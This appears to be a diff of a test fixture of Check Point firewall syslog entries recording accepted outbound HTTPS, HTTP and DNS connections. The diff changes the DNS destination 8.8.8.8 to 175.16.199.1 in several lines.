 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x7,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54646"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x8,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x8,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54848"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.194.133.25"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45034"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60510"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47595"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x9,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47595"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x9,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35669"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.226.19"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57814"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47138"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33386"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33386"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.114"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50732"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.114"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50734"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0xa,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0xa,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57125"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"23"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37516"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"24"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37518"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"25"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"151.101.37.108"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37520"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.226.19"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57828"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34032"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.209"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46472"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54587"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d374,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54587"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
